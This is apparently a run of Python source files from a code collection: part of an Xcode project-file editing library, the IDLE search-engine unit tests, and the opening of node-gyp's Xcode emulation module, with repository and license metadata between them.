== 'PBXFileReference' and f.get('name') in file_list and parent.has_child(f)] else: exists_list = [f.get('name') for f in self.objects.values() if f.get('isa') == 'PBXFileReference' and f.get('name') in file_list] return set(file_list).difference(exists_list) def add_run_script(self, target, script=None): result = [] targets = [t for t in self.get_build_phases('PBXNativeTarget') + self.get_build_phases('PBXAggregateTarget') if t.get('name') == target] if len(targets) != 0 : script_phase = PBXShellScriptBuildPhase.Create(script) for t in targets: skip = False for buildPhase in t['buildPhases']: if self.objects[buildPhase].get('isa') == 'PBXShellScriptBuildPhase' and self.objects[buildPhase].get('shellScript') == script: skip = True if not skip: t['buildPhases'].add(script_phase.id) self.objects[script_phase.id] = script_phase result.append(script_phase) return result def add_run_script_all_targets(self, script=None): result = [] targets = self.get_build_phases('PBXNativeTarget') + self.get_build_phases('PBXAggregateTarget') if len(targets) != 0 : script_phase = PBXShellScriptBuildPhase.Create(script) for t in targets: skip = False for buildPhase in t['buildPhases']: if self.objects[buildPhase].get('isa') == 'PBXShellScriptBuildPhase' and self.objects[buildPhase].get('shellScript') == script: skip = True if not skip: t['buildPhases'].add(script_phase.id) self.objects[script_phase.id] = script_phase result.append(script_phase) return result def add_folder(self, os_path, parent=None, excludes=None, recursive=True, create_build_files=True): if not os.path.isdir(os_path): return [] if not excludes: excludes = [] results = [] if not parent: parent = self.root_group elif not isinstance(parent, PBXGroup): # assume it's an id parent = self.objects.get(parent, self.root_group) path_dict = {os.path.split(os_path)[0]: parent} special_list = [] for (grp_path, subdirs, files) in os.walk(os_path): parent_folder, folder_name = os.path.split(grp_path) parent = path_dict.get(parent_folder, parent) if [sp for sp in special_list if parent_folder.startswith(sp)]: continue if folder_name.startswith('.'): special_list.append(grp_path) continue if os.path.splitext(grp_path)[1] in XcodeProject.special_folders: # if this file has a special extension (bundle or framework mainly) treat it as a file special_list.append(grp_path) new_files = self.verify_files([folder_name], parent=parent) # Ignore this file if it is in excludes if new_files and not [m for m in excludes if re.match(m, grp_path)]: results.extend(self.add_file(grp_path, parent, create_build_files=create_build_files)) continue # create group grp = self.get_or_create_group(folder_name, path=self.get_relative_path(grp_path), parent=parent) path_dict[grp_path] = grp results.append(grp) file_dict = {} for f in files: if f[0] == '.' or [m for m in excludes if re.match(m, f)]: continue kwds = { 'create_build_files': create_build_files, 'parent': grp, 'name': f } f_path = os.path.join(grp_path, f) file_dict[f_path] = kwds new_files = self.verify_files([n.get('name') for n in file_dict.values()], parent=grp) add_files = [(k, v) for k, v in file_dict.items() if v.get('name') in new_files] for path, kwds in add_files: kwds.pop('name', None) self.add_file(path, **kwds) if not recursive: break for r in results: self.objects[r.id] = r return results def path_leaf(self, path): head, tail = ntpath.split(path) return tail or ntpath.basename(head) def add_file_if_doesnt_exist(self, f_path, parent=None, tree='SOURCE_ROOT', create_build_files=True, weak=False, ignore_unknown_type=False): for obj in self.objects.values(): if 'path' in obj: if self.path_leaf(f_path) == self.path_leaf(obj.get('path')): return [] return self.add_file(f_path, parent, tree, create_build_files, weak, ignore_unknown_type=ignore_unknown_type) def my_add_file_reference(self, f_path, parent=None, tree='SOURCE_ROOT', create_build_files=True, weak=False, ignore_unknown_type=False): results = [] abs_path = '' if os.path.isabs(f_path): abs_path = f_path if not os.path.exists(f_path): return results elif tree == 'SOURCE_ROOT': f_path = os.path.relpath(f_path, self.source_root) else: tree = '<absolute>' if not parent: parent = self.root_group elif not isinstance(parent, PBXGroup): # assume it's an id parent = self.objects.get(parent, self.root_group) file_ref = PBXFileReference.Create(f_path, tree, ignore_unknown_type=ignore_unknown_type) parent.add_child(file_ref) results.append(file_ref) self.objects[file_ref.id] = file_ref build_file = PBXBuildFile.Create(file_ref, weak=weak) results.append(build_file) self.objects[build_file.id] = build_file self.modified = True return (file_ref, build_file) def add_file(self, f_path, parent=None, tree='SOURCE_ROOT', create_build_files=True, weak=False, ignore_unknown_type=False): results = [] abs_path = '' if os.path.isabs(f_path): abs_path = f_path if not os.path.exists(f_path): return results elif tree == 'SOURCE_ROOT': f_path = os.path.relpath(f_path, self.source_root) else: tree = '<absolute>' if not parent: parent = self.root_group elif not isinstance(parent, PBXGroup): # assume it's an id parent = self.objects.get(parent, self.root_group) file_ref = PBXFileReference.Create(f_path, tree, ignore_unknown_type=ignore_unknown_type) parent.add_child(file_ref) results.append(file_ref) # create a build file for the file ref if file_ref.build_phase and create_build_files: phases = self.get_build_phases(file_ref.build_phase) for phase in phases: build_file = PBXBuildFile.Create(file_ref, weak=weak) phase.add_build_file(build_file) results.append(build_file) if abs_path and tree == 'SOURCE_ROOT' \ and os.path.isfile(abs_path) \ and file_ref.build_phase == 'PBXFrameworksBuildPhase': library_path = os.path.join('$(SRCROOT)', os.path.split(f_path)[0]) self.add_library_search_paths([library_path], recursive=False) if abs_path and tree == 'SOURCE_ROOT' \ and not os.path.isfile(abs_path) \ and file_ref.build_phase == 'PBXFrameworksBuildPhase': framework_path = os.path.join('$(SRCROOT)', os.path.split(f_path)[0]) self.add_framework_search_paths([framework_path, '$(inherited)'], recursive=False) for r in results: self.objects[r.id] = r if results: self.modified = True return results def check_and_repair_framework(self, base): name = os.path.basename(base) if ".framework" in name: basename = name[:-len(".framework")] finalHeaders = os.path.join(base, "Headers") finalCurrent = os.path.join(base, "Versions/Current") finalLib = os.path.join(base, basename) srcHeaders = "Versions/A/Headers" srcCurrent = "A" srcLib = "Versions/A/" + basename if not os.path.exists(finalHeaders): os.symlink(srcHeaders, finalHeaders) if not os.path.exists(finalCurrent): os.symlink(srcCurrent, finalCurrent) if not os.path.exists(finalLib): os.symlink(srcLib, finalLib) def remove_file(self, id, recursive=True): if not PBXType.IsGuid(id): id = id.id if id in self.objects: self.objects.remove(id) # Remove from PBXResourcesBuildPhase and PBXSourcesBuildPhase if necessary buildFiles = [f for f in self.objects.values() if f.get('isa') == 'PBXBuildFile'] for buildFile in buildFiles: if id == buildFile.get('fileRef'): key = buildFile.id PBXRBP = [f for f in self.objects.values() if f.get('isa') == 'PBXResourcesBuildPhase'] PBXSBP = [f for f in self.objects.values() if f.get('isa') == 'PBXSourcesBuildPhase'] self.objects.remove(key) if PBXSBP[0].has_build_file(key): PBXSBP[0].remove_build_file(key) if PBXRBP[0].has_build_file(key): PBXRBP[0].remove_build_file(key) if recursive: groups = [g for g in self.objects.values() if g.get('isa') == 'PBXGroup'] for group in groups: if id in group['children']: group.remove_child(id) self.modified = True def remove_group(self, id, recursive = False): if not PBXType.IsGuid(id): id = id.id name = self.objects.get(id).get('path') children = self.objects.get(id).get('children') if name is None: name = id if id in self.objects: if recursive: for childKey in children: childValue = self.objects.get(childKey) if childValue.get('isa') == 'PBXGroup': self.remove_group(childKey, True) else: self.remove_file(childKey, False) else: return else: return self.objects.remove(id); def remove_group_by_name(self, name, recursive = False): groups = self.get_groups_by_name(name) if len(groups): for group in groups: self.remove_group(group, recursive) else: return def move_file(self, id, dest_grp=None): pass def apply_patch(self, patch_path, xcode_path): if not os.path.isfile(patch_path) or not os.path.isdir(xcode_path): print 'ERROR: couldn\'t apply "%s" to "%s"' % (patch_path, xcode_path) return print 'applying "%s" to "%s"' % (patch_path, xcode_path) return subprocess.call(['patch', '-p1', '--forward', '--directory=%s' % xcode_path, '--input=%s' % patch_path]) def apply_mods(self, mod_dict, default_path=None): if not default_path: default_path = os.getcwd() keys = mod_dict.keys() for k in keys: v = mod_dict.pop(k) mod_dict[k.lower()] = v parent = mod_dict.pop('group', None) if parent: parent = self.get_or_create_group(parent) excludes = mod_dict.pop('excludes', []) if excludes: excludes = [re.compile(e) for e in excludes] compiler_flags = mod_dict.pop('compiler_flags', {}) for k, v in mod_dict.items(): if k == 'patches': for p in v: if not os.path.isabs(p): p = os.path.join(default_path, p) self.apply_patch(p, self.source_root) elif k == 'folders': # get and compile excludes list # do each folder individually for folder in v: kwds = {} # if path contains ':' remove it and set recursive to False if ':' in folder: args = folder.split(':') kwds['recursive'] = False folder = args.pop(0) if os.path.isabs(folder) and os.path.isdir(folder): pass else: folder = os.path.join(default_path, folder) if not os.path.isdir(folder): continue if parent: kwds['parent'] = parent if excludes: kwds['excludes'] = excludes self.add_folder(folder, **kwds) elif k == 'headerpaths' or k == 'librarypaths': paths = [] for p in v: if p.endswith('/**'): p = os.path.split(p)[0] if not os.path.isabs(p): p = os.path.join(default_path, p) if not os.path.exists(p): continue p = self.get_relative_path(p) paths.append(os.path.join('$(SRCROOT)', p, "**")) if k == 'headerpaths': self.add_header_search_paths(paths) else: self.add_library_search_paths(paths) elif k == 'other_cflags': self.add_other_cflags(v) elif k == 'other_ldflags': self.add_other_ldflags(v) elif k == 'libs' or k == 'frameworks' or k == 'files': paths = {} for p in v: kwds = {} if ':' in p: args = p.split(':') p = args.pop(0) if 'weak' in args: kwds['weak'] = True file_path = os.path.join(default_path, p) search_path, file_name = os.path.split(file_path) if [m for m in excludes if re.match(m, file_name)]: continue try: expr = re.compile(file_name) except re.error: expr = None if expr and os.path.isdir(search_path): file_list = os.listdir(search_path) for f in file_list: if [m for m in excludes if re.match(m, f)]: continue if re.search(expr, f): kwds['name'] = f paths[os.path.join(search_path, f)] = kwds p = None if k == 'libs': kwds['parent'] = self.get_or_create_group('Libraries', parent=parent) elif k == 'frameworks': kwds['parent'] = self.get_or_create_group('Frameworks', parent=parent) if p: kwds['name'] = file_name if k == 'libs': p = os.path.join('usr', 'lib', p) kwds['tree'] = 'SDKROOT' elif k == 'frameworks': p = os.path.join('System', 'Library', 'Frameworks', p) kwds['tree'] = 'SDKROOT' elif k == 'files' and not os.path.exists(file_path): # don't add non-existent files to the project. continue paths[p] = kwds new_files = self.verify_files([n.get('name') for n in paths.values()]) add_files = [(k, v) for k, v in paths.items() if v.get('name') in new_files] for path, kwds in add_files: kwds.pop('name', None) if 'parent' not in kwds and parent: kwds['parent'] = parent self.add_file(path, **kwds) if compiler_flags: for k, v in compiler_flags.items(): filerefs = [] for f in v: filerefs.extend([fr.id for fr in self.objects.values() if fr.get('isa') == 'PBXFileReference' and fr.get('name') == f]) buildfiles = [bf for bf in self.objects.values() if bf.get('isa') == 'PBXBuildFile' and bf.get('fileRef') in filerefs] for bf in buildfiles: if bf.add_compiler_flag(k): self.modified = True def backup(self, file_name=None, backup_name=None): if not file_name: file_name = self.pbxproj_path if not backup_name: backup_name = "%s.%s.backup" % (file_name, datetime.datetime.now().strftime('%d%m%y-%H%M%S')) shutil.copy2(file_name, backup_name) return backup_name def save(self, file_name=None, old_format=False): if old_format : self.saveFormatXML(file_name) else: self.saveFormat3_2(file_name) def saveFormat3_2(self, file_name=None): """Alias for backward compatibility""" self.save_new_format(file_name) def save_format_xml(self, file_name=None): """Saves in old (xml) format""" if not file_name: file_name = self.pbxproj_path # This code is adapted from plistlib.writePlist with open(file_name, "w") as f: writer = PBXWriter(f) writer.writeln("<plist version=\"1.0\">") writer.writeValue(self.data) writer.writeln("</plist>") def save_new_format(self, file_name=None): """Save in Xcode 3.2 compatible (new) format""" if not file_name: file_name = self.pbxproj_path # process to get the section's info and names objs = self.data.get('objects') sections = dict() uuids = dict() for key in objs: l = list() if objs.get(key).get('isa') in sections: l = sections.get(objs.get(key).get('isa')) l.append(tuple([key, objs.get(key)])) sections[objs.get(key).get('isa')] = l if 'name' in objs.get(key): uuids[key] = objs.get(key).get('name') elif 'path' in objs.get(key): uuids[key] = objs.get(key).get('path') else: if objs.get(key).get('isa') == 'PBXProject': uuids[objs.get(key).get('buildConfigurationList')] = 'Build configuration list for PBXProject "Unity-iPhone"' elif objs.get(key).get('isa')[0:3] == 'PBX': uuids[key] = objs.get(key).get('isa')[3:-10] else: uuids[key] = 'Build configuration list for PBXNativeTarget "TARGET_NAME"' ro = self.data.get('rootObject') uuids[ro] = 'Project Object' for key in objs: # transitive references (used in the BuildFile section) if 'fileRef' in objs.get(key) and objs.get(key).get('fileRef') in uuids: uuids[key] = uuids[objs.get(key).get('fileRef')] # transitive reference to the target name (used in the Native target section) if objs.get(key).get('isa') == 'PBXNativeTarget': uuids[objs.get(key).get('buildConfigurationList')] = uuids[objs.get(key).get('buildConfigurationList')].replace('TARGET_NAME', uuids[key]) self.uuids = uuids self.sections = sections out = open(file_name, 'w') out.write('// !$*UTF8*$!\n') self._printNewXCodeFormat(out, self.data, '', enters=True) out.close() @classmethod def addslashes(cls, s): d = {'"': '\\"', "'": "\\'", "\0": "\\\0", "\\": "\\\\", "\n":"\\n"} return ''.join(d.get(c, c) for c in s) def _printNewXCodeFormat(self, out, root, deep, enters=True): if isinstance(root, IterableUserDict): out.write('{') if enters: out.write('\n') isa = root.pop('isa', '') if isa != '': # keep the isa in the first spot if enters: out.write('\t' + deep) out.write('isa = ') self._printNewXCodeFormat(out, isa, '\t' + deep, enters=enters) out.write(';') if enters: out.write('\n') else: out.write(' ') for key in sorted(root.iterkeys()): # keep the same order as Apple. if enters: out.write('\t' + deep) if re.match(regex, key).group(0) == key: out.write(key.encode("utf-8") + ' = ') else: out.write('"' + key.encode("utf-8") + '" = ') if key == 'objects': out.write('{') # open the objects section if enters: out.write('\n') #root.remove('objects') # remove it to avoid problems sections = [ ('PBXBuildFile', False), ('PBXCopyFilesBuildPhase', True), ('PBXFileReference', False), ('PBXFrameworksBuildPhase', True), ('PBXGroup', True), ('PBXAggregateTarget', True), ('PBXNativeTarget', True), ('PBXProject', True), ('PBXResourcesBuildPhase', True), ('PBXShellScriptBuildPhase', True), ('PBXSourcesBuildPhase', True), ('XCBuildConfiguration', True), ('XCConfigurationList', True), ('PBXTargetDependency', True), ('PBXVariantGroup', True), ('PBXReferenceProxy', True), ('PBXContainerItemProxy', True), ('XCVersionGroup', True)] for section in sections: # iterate over the sections if self.sections.get(section[0]) is None: continue out.write('\n/* Begin %s section */' % section[0].encode("utf-8")) self.sections.get(section[0]).sort(cmp=lambda x, y: cmp(x[0], y[0])) for pair in self.sections.get(section[0]): key = pair[0] value = pair[1] out.write('\n') if enters: out.write('\t\t' + deep) out.write(key.encode("utf-8")) if key in self.uuids: out.write(" /* " + self.uuids[key].encode("utf-8") + " */") out.write(" = ") self._printNewXCodeFormat(out, value, '\t\t' + deep, enters=section[1]) out.write(';') out.write('\n/* End %s section */\n' % section[0].encode("utf-8")) out.write(deep + '\t}') # close of the objects section else: self._printNewXCodeFormat(out, root[key], '\t' + deep, enters=enters) out.write(';') if enters: out.write('\n') else: out.write(' ') root['isa'] = isa # restore the isa for further calls if enters: out.write(deep) out.write('}') elif isinstance(root, UserList): out.write('(') if enters: out.write('\n') for value in root: if enters: out.write('\t' + deep) self._printNewXCodeFormat(out, value, '\t' + deep, enters=enters) out.write(',') if enters: out.write('\n') if enters: out.write(deep) out.write(')') else: if len(root) > 0 and re.match(regex, root).group(0) == root: out.write(root.encode("utf-8")) else: out.write('"' + XcodeProject.addslashes(root.encode("utf-8")) + '"') if root in self.uuids: out.write(" /* " + self.uuids[root].encode("utf-8") + " */") @classmethod def Load(cls, path): cls.plutil_path = os.path.join(os.path.split(__file__)[0], 'plutil') if not os.path.isfile(XcodeProject.plutil_path): cls.plutil_path = 'plutil' # load project by converting to xml and then convert that using plistlib p = subprocess.Popen([XcodeProject.plutil_path, '-convert', 'xml1', '-o', '-', path], stdout=subprocess.PIPE) stdout, stderr = p.communicate() # If the plist was malformed, returncode will be non-zero if p.returncode != 0: print stdout return None tree = plistlib.readPlistFromString(stdout) return XcodeProject(tree, path) @classmethod def LoadFromXML(cls, path): tree = plistlib.readPlist(path) return XcodeProject(tree, path) # The code below was adapted from plistlib.py. class PBXWriter(plistlib.PlistWriter): def writeValue(self, value): if isinstance(value, (PBXList, PBXDict)): plistlib.PlistWriter.writeValue(self, value.data) else: plistlib.PlistWriter.writeValue(self, value) def simpleElement(self, element, value=None): """ We have to override this method to deal with Unicode text correctly. Non-ascii characters have to get encoded as character references. """ if value is not None: value = _escapeAndEncode(value) self.writeln("<%s>%s</%s>" % (element, value, element)) else: self.writeln("<%s/>" % element) # Regex to find any control chars, except for \t \n and \r _controlCharPat = re.compile( r"[\x00\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0e\x0f" r"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f]") def _escapeAndEncode(text): m = _controlCharPat.search(text) if m is not None: raise ValueError("strings can't contains control characters; " "use plistlib.Data instead") text = text.replace("\r\n", "\n") # convert DOS line endings text = text.replace("\r", "\n") # convert Mac line endings text = text.replace("&", "&amp;") # escape '&' text = text.replace("<", "&lt;") # escape '<' text = text.replace(">", "&gt;") # escape '>' return text.encode("ascii", "xmlcharrefreplace") # encode as ascii with xml character references def main(): import json import argparse import subprocess import shutil import os parser = argparse.ArgumentParser("Modify an xcode project file using a single command at a time.") parser.add_argument('project', help="Project path") parser.add_argument('configuration', help="Modify the flags of the given configuration", choices=['Debug', 'Release', 'All']) parser.add_argument('-af', help='Add a flag value, in the format key=value', action='append') parser.add_argument('-rf', help='Remove a flag value, in the format key=value', action='append') parser.add_argument('-b', '--backup', help='Create a temporary backup before modify', action='store_true') args = parser.parse_args(); # open the project file if os.path.isdir(args.project) : args.project = args.project + "/project.pbxproj" if not os.path.isfile(args.project) : raise Exception("Project File not found") project = XcodeProject.Load(args.project) backup_file = None if args.backup : backup_file = project.backup() # apply the commands # add flags if args.af : pairs = {} for flag in args.af: tokens = flag.split("=") pairs[tokens[0]] = tokens[1] project.add_flags(pairs, args.configuration) # remove flags if args.rf : pairs = {} for flag in args.rf: tokens = flag.split("=") pairs[tokens[0]] = tokens[1] project.remove_flags(pairs, args.configuration) # save the file project.save() # remove backup if everything was ok. if args.backup : os.remove(backup_file) if __name__ == "__main__": main()
mpl-2.0
NEricN/RobotCSimulator
Python/App/Lib/idlelib/idle_test/test_searchengine.py
23
11486
'''Test functions and SearchEngine class in SearchEngine.py.''' # With mock replacements, the module does not use any gui widgets. # The use of tk.Text is avoided (for now, until mock Text is improved) # by patching instances with an index function returning what is needed. # This works because mock Text.get does not use .index. import re import unittest from test.test_support import requires from Tkinter import BooleanVar, StringVar, TclError # ,Tk, Text import tkMessageBox from idlelib import SearchEngine as se from idlelib.idle_test.mock_tk import Var, Mbox from idlelib.idle_test.mock_tk import Text as mockText def setUpModule(): # Replace s-e module tkinter imports other than non-gui TclError. se.BooleanVar = Var se.StringVar = Var se.tkMessageBox = Mbox def tearDownModule(): # Restore 'just in case', though other tests should also replace. se.BooleanVar = BooleanVar se.StringVar = StringVar se.tkMessageBox = tkMessageBox class Mock: def __init__(self, *args, **kwargs): pass class GetTest(unittest.TestCase): # SearchEngine.get returns singleton created & saved on first call. def test_get(self): saved_Engine = se.SearchEngine se.SearchEngine = Mock # monkey-patch class try: root = Mock() engine = se.get(root) self.assertIsInstance(engine, se.SearchEngine) self.assertIs(root._searchengine, engine) self.assertIs(se.get(root), engine) finally: se.SearchEngine = saved_Engine # restore class to module class GetLineColTest(unittest.TestCase): # Test simple text-independent helper function def test_get_line_col(self): self.assertEqual(se.get_line_col('1.0'), (1, 0)) self.assertEqual(se.get_line_col('1.11'), (1, 11)) self.assertRaises(ValueError, se.get_line_col, ('1.0 lineend')) self.assertRaises(ValueError, se.get_line_col, ('end')) class GetSelectionTest(unittest.TestCase): # Test text-dependent helper function. ## # Need gui for text.index('sel.first/sel.last/insert'). ## @classmethod ## def setUpClass(cls): ## requires('gui') ## cls.root = Tk() ## ## @classmethod ## def tearDownClass(cls): ## cls.root.destroy() ## del cls.root def test_get_selection(self): # text = Text(master=self.root) text = mockText() text.insert('1.0', 'Hello World!') # fix text.index result when called in get_selection def sel(s): # select entire text, cursor irrelevant if s == 'sel.first': return '1.0' if s == 'sel.last': return '1.12' raise TclError text.index = sel # replaces .tag_add('sel', '1.0, '1.12') self.assertEqual(se.get_selection(text), ('1.0', '1.12')) def mark(s): # no selection, cursor after 'Hello' if s == 'insert': return '1.5' raise TclError text.index = mark # replaces .mark_set('insert', '1.5') self.assertEqual(se.get_selection(text), ('1.5', '1.5')) class ReverseSearchTest(unittest.TestCase): # Test helper function that searches backwards within a line. def test_search_reverse(self): Equal = self.assertEqual line = "Here is an 'is' test text." prog = re.compile('is') Equal(se.search_reverse(prog, line, len(line)).span(), (12, 14)) Equal(se.search_reverse(prog, line, 14).span(), (12, 14)) Equal(se.search_reverse(prog, line, 13).span(), (5, 7)) Equal(se.search_reverse(prog, line, 7).span(), (5, 7)) Equal(se.search_reverse(prog, line, 6), None) class SearchEngineTest(unittest.TestCase): # Test class methods that do not use Text widget. def setUp(self): self.engine = se.SearchEngine(root=None) # Engine.root is only used to create error message boxes. # The mock replacement ignores the root argument. def test_is_get(self): engine = self.engine Equal = self.assertEqual Equal(engine.getpat(), '') engine.setpat('hello') Equal(engine.getpat(), 'hello') Equal(engine.isre(), False) engine.revar.set(1) Equal(engine.isre(), True) Equal(engine.iscase(), False) engine.casevar.set(1) Equal(engine.iscase(), True) Equal(engine.isword(), False) engine.wordvar.set(1) Equal(engine.isword(), True) Equal(engine.iswrap(), True) engine.wrapvar.set(0) Equal(engine.iswrap(), False) Equal(engine.isback(), False) engine.backvar.set(1) Equal(engine.isback(), True) def test_setcookedpat(self): engine = self.engine engine.setcookedpat('\s') self.assertEqual(engine.getpat(), '\s') engine.revar.set(1) engine.setcookedpat('\s') self.assertEqual(engine.getpat(), r'\\s') def test_getcookedpat(self): engine = self.engine Equal = self.assertEqual Equal(engine.getcookedpat(), '') engine.setpat('hello') Equal(engine.getcookedpat(), 'hello') engine.wordvar.set(True) Equal(engine.getcookedpat(), r'\bhello\b') engine.wordvar.set(False) engine.setpat('\s') Equal(engine.getcookedpat(), r'\\s') engine.revar.set(True) Equal(engine.getcookedpat(), '\s') def test_getprog(self): engine = self.engine Equal = self.assertEqual engine.setpat('Hello') temppat = engine.getprog() Equal(temppat.pattern, re.compile('Hello', re.IGNORECASE).pattern) engine.casevar.set(1) temppat = engine.getprog() Equal(temppat.pattern, re.compile('Hello').pattern, 0) engine.setpat('') Equal(engine.getprog(), None) engine.setpat('+') engine.revar.set(1) Equal(engine.getprog(), None) self.assertEqual(Mbox.showerror.message, 'Error: nothing to repeat\nPattern: +') def test_report_error(self): showerror = Mbox.showerror Equal = self.assertEqual pat = '[a-z' msg = 'unexpected end of regular expression' Equal(self.engine.report_error(pat, msg), None) Equal(showerror.title, 'Regular expression error') expected_message = ("Error: " + msg + "\nPattern: [a-z") Equal(showerror.message, expected_message) Equal(self.engine.report_error(pat, msg, 5), None) Equal(showerror.title, 'Regular expression error') expected_message += "\nOffset: 5" Equal(showerror.message, expected_message) class SearchTest(unittest.TestCase): # Test that search_text makes right call to right method. @classmethod def setUpClass(cls): ## requires('gui') ## cls.root = Tk() ## cls.text = Text(master=cls.root) cls.text = mockText() test_text = ( 'First line\n' 'Line with target\n' 'Last line\n') cls.text.insert('1.0', test_text) cls.pat = re.compile('target') cls.engine = se.SearchEngine(None) cls.engine.search_forward = lambda *args: ('f', args) cls.engine.search_backward = lambda *args: ('b', args) ## @classmethod ## def tearDownClass(cls): ## cls.root.destroy() ## del cls.root def test_search(self): Equal = self.assertEqual engine = self.engine search = engine.search_text text = self.text pat = self.pat engine.patvar.set(None) #engine.revar.set(pat) Equal(search(text), None) def mark(s): # no selection, cursor after 'Hello' if s == 'insert': return '1.5' raise TclError text.index = mark Equal(search(text, pat), ('f', (text, pat, 1, 5, True, False))) engine.wrapvar.set(False) Equal(search(text, pat), ('f', (text, pat, 1, 5, False, False))) engine.wrapvar.set(True) engine.backvar.set(True) Equal(search(text, pat), ('b', (text, pat, 1, 5, True, False))) engine.backvar.set(False) def sel(s): if s == 'sel.first': return '2.10' if s == 'sel.last': return '2.16' raise TclError text.index = sel Equal(search(text, pat), ('f', (text, pat, 2, 16, True, False))) Equal(search(text, pat, True), ('f', (text, pat, 2, 10, True, True))) engine.backvar.set(True) Equal(search(text, pat), ('b', (text, pat, 2, 10, True, False))) Equal(search(text, pat, True), ('b', (text, pat, 2, 16, True, True))) class ForwardBackwardTest(unittest.TestCase): # Test that search_forward method finds the target. ## @classmethod ## def tearDownClass(cls): ## cls.root.destroy() ## del cls.root @classmethod def setUpClass(cls): cls.engine = se.SearchEngine(None) ## requires('gui') ## cls.root = Tk() ## cls.text = Text(master=cls.root) cls.text = mockText() # search_backward calls index('end-1c') cls.text.index = lambda index: '4.0' test_text = ( 'First line\n' 'Line with target\n' 'Last line\n') cls.text.insert('1.0', test_text) cls.pat = re.compile('target') cls.res = (2, (10, 16)) # line, slice indexes of 'target' cls.failpat = re.compile('xyz') # not in text cls.emptypat = re.compile('\w*') # empty match possible def make_search(self, func): def search(pat, line, col, wrap, ok=0): res = func(self.text, pat, line, col, wrap, ok) # res is (line, matchobject) or None return (res[0], res[1].span()) if res else res return search def test_search_forward(self): # search for non-empty match Equal = self.assertEqual forward = self.make_search(self.engine.search_forward) pat = self.pat Equal(forward(pat, 1, 0, True), self.res) Equal(forward(pat, 3, 0, True), self.res) # wrap Equal(forward(pat, 3, 0, False), None) # no wrap Equal(forward(pat, 2, 10, False), self.res) Equal(forward(self.failpat, 1, 0, True), None) Equal(forward(self.emptypat, 2, 9, True, ok=True), (2, (9, 9))) #Equal(forward(self.emptypat, 2, 9, True), self.res) # While the initial empty match is correctly ignored, skipping # the rest of the line and returning (3, (0,4)) seems buggy - tjr. Equal(forward(self.emptypat, 2, 10, True), self.res) def test_search_backward(self): # search for non-empty match Equal = self.assertEqual backward = self.make_search(self.engine.search_backward) pat = self.pat Equal(backward(pat, 3, 5, True), self.res) Equal(backward(pat, 2, 0, True), self.res) # wrap Equal(backward(pat, 2, 0, False), None) # no wrap Equal(backward(pat, 2, 16, False), self.res) Equal(backward(self.failpat, 3, 9, True), None) Equal(backward(self.emptypat, 2, 10, True, ok=True), (2, (9,9))) # Accepted because 9 < 10, not because ok=True. # It is not clear that ok=True is useful going back - tjr Equal(backward(self.emptypat, 2, 9, True), (2, (5, 9))) if __name__ == '__main__': unittest.main(verbosity=2, exit=2)
apache-2.0
jhaynie/titanium_mobile
node_modules/node-gyp/gyp/pylib/gyp/xcode_emulation.py
1283
65086
# Copyright (c) 2012 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ This module contains classes that help to emulate xcodebuild behavior on top of other build systems, such as make and ninja. """ import copy import gyp.common import os import os.path import re import shlex import subprocess import sys import tempfile from gyp.common import GypError # Populated lazily by XcodeVersion, for efficiency, and to fix an issue when # "xcodebuild" is called too quickly (it has been found to return incorrect # version number). XCODE_VERSION_CACHE = None # Populated lazily by GetXcodeArchsDefault, to an |XcodeArchsDefault| instance # corresponding to the installed version of Xcode. XCODE_ARCHS_DEFAULT_CACHE = None def XcodeArchsVariableMapping(archs, archs_including_64_bit=None): """Constructs a dictionary with expansion for $(ARCHS_STANDARD) variable, and optionally for $(ARCHS_STANDARD_INCLUDING_64_BIT).""" mapping = {'$(ARCHS_STANDARD)': archs} if archs_including_64_bit: mapping['$(ARCHS_STANDARD_INCLUDING_64_BIT)'] = archs_including_64_bit return mapping class XcodeArchsDefault(object): """A class to resolve ARCHS variable from xcode_settings, resolving Xcode macros and implementing filtering by VALID_ARCHS. The expansion of macros depends on the SDKROOT used ("macosx", "iphoneos", "iphonesimulator") and on the version of Xcode. """ # Match variable like $(ARCHS_STANDARD). variable_pattern = re.compile(r'\$\([a-zA-Z_][a-zA-Z0-9_]*\)$') def __init__(self, default, mac, iphonesimulator, iphoneos): self._default = (default,) self._archs = {'mac': mac, 'ios': iphoneos, 'iossim': iphonesimulator} def _VariableMapping(self, sdkroot): """Returns the dictionary of variable mapping depending on the SDKROOT.""" sdkroot = sdkroot.lower() if 'iphoneos' in sdkroot: return self._archs['ios'] elif 'iphonesimulator' in sdkroot: return self._archs['iossim'] else: return self._archs['mac'] def _ExpandArchs(self, archs, sdkroot): """Expands variables references in ARCHS, and remove duplicates.""" variable_mapping = self._VariableMapping(sdkroot) expanded_archs = [] for arch in archs: if self.variable_pattern.match(arch): variable = arch try: variable_expansion = variable_mapping[variable] for arch in variable_expansion: if arch not in expanded_archs: expanded_archs.append(arch) except KeyError as e: print 'Warning: Ignoring unsupported variable "%s".' % variable elif arch not in expanded_archs: expanded_archs.append(arch) return expanded_archs def ActiveArchs(self, archs, valid_archs, sdkroot): """Expands variables references in ARCHS, and filter by VALID_ARCHS if it is defined (if not set, Xcode accept any value in ARCHS, otherwise, only values present in VALID_ARCHS are kept).""" expanded_archs = self._ExpandArchs(archs or self._default, sdkroot or '') if valid_archs: filtered_archs = [] for arch in expanded_archs: if arch in valid_archs: filtered_archs.append(arch) expanded_archs = filtered_archs return expanded_archs def GetXcodeArchsDefault(): """Returns the |XcodeArchsDefault| object to use to expand ARCHS for the installed version of Xcode. The default values used by Xcode for ARCHS and the expansion of the variables depends on the version of Xcode used. For all version anterior to Xcode 5.0 or posterior to Xcode 5.1 included uses $(ARCHS_STANDARD) if ARCHS is unset, while Xcode 5.0 to 5.0.2 uses $(ARCHS_STANDARD_INCLUDING_64_BIT). This variable was added to Xcode 5.0 and deprecated with Xcode 5.1. For "macosx" SDKROOT, all version starting with Xcode 5.0 includes 64-bit architecture as part of $(ARCHS_STANDARD) and default to only building it. For "iphoneos" and "iphonesimulator" SDKROOT, 64-bit architectures are part of $(ARCHS_STANDARD_INCLUDING_64_BIT) from Xcode 5.0. From Xcode 5.1, they are also part of $(ARCHS_STANDARD). All thoses rules are coded in the construction of the |XcodeArchsDefault| object to use depending on the version of Xcode detected. The object is for performance reason.""" global XCODE_ARCHS_DEFAULT_CACHE if XCODE_ARCHS_DEFAULT_CACHE: return XCODE_ARCHS_DEFAULT_CACHE xcode_version, _ = XcodeVersion() if xcode_version < '0500': XCODE_ARCHS_DEFAULT_CACHE = 